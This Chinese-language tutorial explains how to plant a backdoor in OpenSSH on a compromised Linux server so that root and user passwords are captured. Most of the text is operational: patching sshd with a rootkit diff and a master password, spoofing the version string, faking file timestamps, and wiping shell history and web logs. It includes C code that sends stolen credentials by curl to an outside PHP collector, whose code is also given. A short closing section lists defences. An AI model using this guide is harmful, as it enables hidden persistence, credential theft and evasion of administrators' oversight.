OpenSSH后門獲取root密碼及防范
相對於Windows操作系統,Linux操作系統的密碼較難獲取。而很多Linux服務器都配置了Openssh服務,在獲取root權限的情況下,可以通過修改或者更新OpenSSH代碼等方法,截取並保存其SSH登錄賬號密碼,甚至可以留一個隱形的后門,達到長期控制linux服務器的目的。在很多Linux系統被入侵后都會在系統中留后門,使用OpenSSH留后門是入侵者的慣用方式之一,OpenSSh后門比較難於檢測,本文就如何添加OpenSSH后門以及防范后門添加進行探討。
1.1OpenSSH簡介
OpenSSH是SSH(Secure SHell)協議的免費開源實現,很多人誤認OpenSSH為與OpenSSL有關聯,但實際上這兩個計划的有不同的目的,不同的發展團隊,名稱相近只是因為兩者有同樣的軟件發展目標──提供開放源代碼的加密通訊軟件。OpenSSH是OpenBSD的子計划其官方網站地址為http://www.openssh.com/,OpenSSH各個版本可以到其官網下載,推薦一個下載地址:http://ftp5.eu.openbsd.org/ftp/pub/OpenBSD/OpenSSH/。SSH協議族可以用來進行遠程控制,或在計算機之間傳送文件。而實現此功能的傳統方式,如telnet(終端仿真協議)、rcp、ftp、rlogin、rsh都是極為不安全的,並且會使用明文傳送密碼。OpenSSH提供了服務端后台程序和客戶端工具,用來加密遠程控件和文件傳輸過程中的數據,並由此來代替原來的類似服務。OpenSSH是使用SSH透過計算機網絡加密通訊的實現。它是取代由SSH Communications Security所提供的商用版本的開放源代碼方案。在OpenSSH服務中sshd是一個典型的獨立守護進程,OpenSSH服務可以通過/etc/ssh/sshd_config文件進行配置。OpenSSH 支持 SSH 協議的版本 1.3、1.5、和 2。自從 OpenSSH 的版本2.9以來,默認的協議是版本2。
1.2准備工作
(1)下載openssh-5.9p1.tar.gz參考下載地址:
http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz
(2)下載后門文件http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
(3)Linux虛擬機Centos6.4版本
(4)查看SSH當前版本信息
SSH后門目前網上支持版本為5.9以下,因此如果顯示信息中的版本為5.9以下才能使用,如圖1所示,使用“ssh –V”命令獲取的OpenSSH版本為“OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010”。對高於5.9版本未做測試,理論上是可行的,因為在patch中可以直接修改banner。特別需要注意,這個版本號一定要記錄下來,在編譯時將該信息進行偽裝。
圖1 查看SSH當前版本信息
(5)備份SSH原始配置文件
如圖2所示,將ssh_config和sshd_config分別備份為ssh_config.old和sshd_config.old。在Linux終端中分別執行文件備份命令:
mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
圖2 備份SSH原始配置文件
(6)解壓ssh后門
將sshbd.tgz下載到本地並解壓到本地,如圖3所示,執行以下命令:
tar zxvf sshbd.tgz
cd openssh
圖3 下載並解壓ssh后門
使用官方openssh-5.9p1進行安裝后門的可以執行以下命令
tar zxf openssh-5.9p1.tar tar zxf openssh-5.9p1.path.tar cp openssh-5.9p1.patch/sshbd5.9p1.diff /openssh-5.9p1 cd openssh-5.9p1 patch < sshbd5.9p1.diff
1.3設置ssh后門的登錄密碼及其密碼記錄位置
在openssh目錄中找到includes.h,使用“vi includes.h”修改define _SECRET_PASSWD為自己的登錄密碼,如圖4所示,默認密碼記錄日志文件保存在/usr/local/share/0wn目錄下的slog和clog文件。例如定義密碼為“995430aaa”
define _SECRET_PASSWD " 995430aaa"
圖4 修改ssh登錄密碼
1.4安裝並編譯
1.進行編譯和安裝
./configure –prefix=/usr –sysconfdir=/etc/ssh
make && make install
openssh-5.9p1需要用下面這個命令進行配置:
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
在編譯過程中可能會出現“configure: error: *** zlib.h missing – please install first or check config.log”錯誤,可以執行“yum install zlib-devel和yum install openssl openssl-devel”安裝后再次編譯即可。
2.重啟SSHD服務
執行“/etc/init.d/sshd restart”命令重啟sshd服務。
3.還原新配置文件為舊配置文件時間
執行以下命令,將ssh_config和sshd_config修改時間跟ssh_config.old和sshd_config.old一致。
touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config
mtime(modify time):最后一次修改文件或目錄的時間
ctime(chang time) :最后一次改變文件或目錄(改變的是原數據即:屬性)的時間
如:記錄該文件的inode節點被修改的時間。touch命令除了-d和-t選項外都會改變該時間。而且chmod,chown等命令也能改變該值。
atime(access time)::最后一次訪問文件或目錄的時間
ls -l file : 查看文件修改時間
ls -lc file: 查看文件狀態改動時間
ls -lu file: 查看文件訪問時間
stat file 文件時間三個屬性
1.5登入后門並查看記錄的密碼文件
使用“ssh -l root IP”命令登錄服務器,例如“ssh -l root 192.168.52.175”登錄,可以使用root的密碼,也可以使用后門設置的密碼“995430aaa”進行登錄。然后到/usr/local/share/0wn目錄查看其記錄的密碼日志文件clog和slog,如圖5所示,可以看到ssh登錄和本地root帳號登錄的密碼。
圖5 查看密碼記錄
在實際測試過程還需要清除apache日志,以下可供參考的日志清除命令:
export HISTFILE=/dev/null export HISTSIZE=0 cd /etc/httpd/logs/ sed -i ‘/192.168.52.175/d’ access_log* echo >/root/.bash_history //清空操作日志
1.6拓展密碼記錄方式
前面記錄的密碼只能在linux服務器上面看,也就是說用戶必須要讀取文件的權限,如果某一天權限沒有了,則無法登陸服務器了;最好的方法就是記錄的用戶、密碼和端口可以通過郵件或者http直接發送到接收端,跟黑產收信比較類似。下面是具體實現方法:
(1)接收端ssh.php代碼
<?php $username = $_POST['username']; $password = $_POST['password']; $host = $_POST['host']; $port = $_POST['port']; $time=date('Y-m-d H:i:s',time()); if(isset($username) != "" || isset($password) !="" || isset($host) != "") { $fp = fopen("sshlog.txt","a+"); $result = "sername:.$username--->:Password:$password----->:Host:$host----->:port:$port----->:time:$time"; fwrite($fp,$result); fwrite($fp,"\r\n"); fclose($fp); } ?>
(2)修改auth-passwd.c文件內容
int userauth_passwd(Authctxt *authctxt) { static int attempt = 0; char prompt[150]; char *password; char *pass[200]; char szres[1024] = {0}; FILE *f; char *findport() { FILE *FTopen; char tempBuf[1024] = {0}; char *Filename = "/etc/ssh/sshd_config"; char *Filetext = "Port"; if((FTopen = fopen(Filename, "r")) == NULL) { return Filetext; } while(fgets(tempBuf, 1024, FTopen) != NULL) { if(strstr(tempBuf, Filetext)) { Filetext = tempBuf; break; } memset(tempBuf, 0, 1024); } fclose(FTopen); return Filetext; } const char *host = options.host_key_alias ? options.host_key_alias : authctxt->host; if (attempt++ >= options.number_of_password_prompts) return 0; if (attempt != 1) error("Permission denied, please try again."); snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ", authctxt->server_user, host); password = read_passphrase(prompt, 0); strcpy(pass,password);//截取的密碼的時候把它復制到自定義的地方去。方便調用 packet_start(SSH2_MSG_USERAUTH_REQUEST); packet_put_cstring(authctxt->server_user); packet_put_cstring(authctxt->service); packet_put_cstring(authctxt->method->name); packet_put_char(0); packet_put_cstring(password); memset(password, 0, strlen(password)); xfree(password); packet_add_padding(64); packet_send(); dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ, &input_userauth_passwd_changereq); if((f=fopen("/tmp/olog","a+"))!=NULL){ fprintf(f,"username:%s-->password:%s-->host:%s-->port:%s\n",authctxt->server_user,pass,authctxt->host,findport()); fclose(f);} memset(szres,0,sizeof(szres)); snprintf(szres,sizeof(szres),"/usr/bin/curl -s -d \"username=%s&password=%s&host=%s&port=%s\" http://www.antian365.com/ssh.php >/dev/null",authctxt->server_user,pass,authctxt->host,findport()); system(szres); return 1; }
重新編譯之,執行后將自動將密碼發送到服務器。但本人在實際測試效果並沒有達到作者所說的,相關信息請訪問http://0cx.cc/ssh_get_password.jspx查看並驗證。
1.7OpenSSH后門防范方法
(1)重裝openssh軟件,更新至最新版本7.2
(2)更換ssh默認登錄端口22為其它端口。
(3)在iptable中添加ssh訪問策略。
(4)查看命令歷史記錄,對可疑文件進行清理,在有條件的情況下,可重做系統。
(5)修改服務器所有密碼為新的強健密碼。
(6)利用strace找出ssh后門,首先利用命令“ps aux | grep sshd”獲取可疑進程PID,使用“strace -o aa -ff -p PID”進行跟蹤,然后登錄ssh,成功登錄之后,在當前目錄,生成了strace的輸出。使用“grep open aa* | grep -v -e No -e null -e denied| grep WR”命令查看記錄密碼打開文件。在上面命令中過濾掉錯誤信息和/dev/null信息,以及denied信息,並且找讀寫模式打開(WR)的,因為要把記錄的密碼寫入文件,肯定要是以寫方式打開的文件,可以可以找到以讀寫方式記錄在文件中的ssh后門密碼文件位置,通過該方法來判斷是否存在ssh后門。當然也有不記錄密碼,而僅僅留一個萬能ssh后門。
2.5.8OpenSSH利用總結
1.獲取linux版本及其信息
cat /etc/issue
uname -ar
2.獲取ssh版本信息並記錄
ssh -V >ssh.txt
3.下載openssh客戶端以及后門程序
wget http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
注:網上還有一個現存版本sshd.tar.gz
4.ssh配置文件備份
mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
5.安裝必備軟件
yum install -y openssl openssl-devel pam-devel zlib zlib-devel
6.解壓並patch
tar zxf openssh-5.9p1.tar.gz tar zxf openssh-5.9p1.tar.gz cp openssh-5.9p1.patch/sshbd5.9p1.diff /openssh-5.9p1 cd openssh-5.9p1 patch < sshbd5.9p1.diff
7.修改文件includes.h 文件記錄用戶名和密碼的文件位置及其密碼
#define ILOG "/tmp/ilog" //記錄登錄到本機的用戶名和密碼 #define OLOG "/tmp/olog" //記錄本機登錄到遠程的用戶名和密碼 #define SECRETPW "123456654321" //你后門的密碼
8.修改version.h文件使其修改后的版本信息為原始版本
#define SSH_VERSION "填入之前記下來的版本號,偽裝原版本" #define SSH_PORTABLE "小版本號"
9.安裝並編譯
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 make clean make && make install service sshd restart
10.恢復新配置文件的日期跟舊文件日期一致
對ssh_config和sshd_config新舊文件進行內容對比,使其配置文件一致,然后在修改文件日期。
touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config
11.清除操作日志
export HISTFILE=/dev/null export HISTSIZE=0 cd /etc/httpd/logs/ sed -i ‘/192.168.52.175/d’ access_log* echo >/root/.bash_history //清空操作日志